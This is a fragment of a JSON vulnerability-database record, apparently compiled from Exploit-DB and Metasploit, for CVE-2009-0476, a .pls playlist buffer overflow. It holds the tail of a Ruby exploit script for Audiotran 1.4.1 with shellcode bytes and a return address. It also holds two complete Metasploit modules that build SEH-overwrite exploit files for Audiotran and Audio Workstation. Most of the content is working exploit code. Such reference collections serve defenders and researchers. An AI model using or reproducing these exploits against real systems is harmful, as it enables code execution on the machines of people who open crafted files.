+\r\n\"\\x51\\x52\\xff\\x54\\x24\\x0c\\xe8\\xdf\\xff\\xff\\xff\\x57\" +\r\n\"\\x7f\\x29\\x62\\xe8\\xe6\\xff\\xff\\xff\\x43\\x6f\\x72\\x65\" +\r\n\"\\x6c\\x61\\x6e\\x20\\x54\\x65\\x61\\x6d\\x20\\x53\\x68\\x65\" +\r\n\"\\x6c\\x6c\\x63\\x6f\\x64\\x65\\x20\\x2d\\x20\\x50\\x72\\x6f\" +\r\n\"\\x67\\x72\\x61\\x6d\\x20\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\" +\r\n\"\\x65\\x64\\x20\\x73\\x75\\x63\\x65\\x73\\x73\\x66\\x75\\x6c\" +\r\n\"\\x6c\\x79\\x58\"\r\n\r\nprint banner\r\nputs \"[+] Exploit for Audiotran 1.4.1.\"\r\n\r\nfilename = \"audiotran_poc.pls\"\r\nf = File.new(filename, 'w')\r\nf.write 'A' * 1308 #padding\r\nf.write \"\\xeb\\x06\\x90\\x90\"\r\nf.write \"\\xcb\\x75\\x52\\x73\" # ret at 0x735275CB [msvbvm60.dll]\r\nf.write payload\r\nf.write 'A' * 9000 # padding\r\nf.close\r\n\r\nputs \"[+] Wrote exploit file : #{filename}.\"", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11079/"}], "metasploit": [{"lastseen": "2020-06-14T23:58:43", "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module.\n", "published": "2010-01-28T19:24:41", "type": "metasploit", "title": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIOTRAN_PLS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.\n },\n 'License' => MSF_LICENSE,\n 'Author' \t =>\n [\n 'Sebastien Duquette',\n 'dookie',\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0476'],\n [ 'OSVDB', '55424'],\n [ 'EDB', '11079' ],\n ],\n 'Payload' =>\n {\n 'Space' => 6000,\n 'BadChars' => \"\\x00\\x0a\\x3d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\n ])\n\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(1308)\n sploit << generate_seh_payload(target.ret)\n sploit << rand_text_alpha_upper(8000)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(sploit)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/audiotran_pls.rb"}, {"lastseen": "2020-08-02T21:15:05", "description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.\n", "published": "2009-12-10T20:46:53", "type": "metasploit", "title": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIO_WKSTN_PLS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'germaya_x', 'dookie', ],\n 'References' =>\n [\n [ 'CVE', '2009-0476' ],\n [ 'OSVDB', '55424' ],\n [ 'EDB', '10353' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => true,\n 'AllowWin32SEH' => true\n },\n 'Payload' =>\n {\n 'Space' => 4100,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'DisableNops' => 'True',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 08 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\n ])\n\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(1308)\n sploit << \"\\xeb\\x16\\x90\\x90\"\n sploit << [target.ret].pack('V')\n sploit << make_nops(32)\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(4652 - payload.encoded.length)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/audio_wkstn_pls.rb"}]}
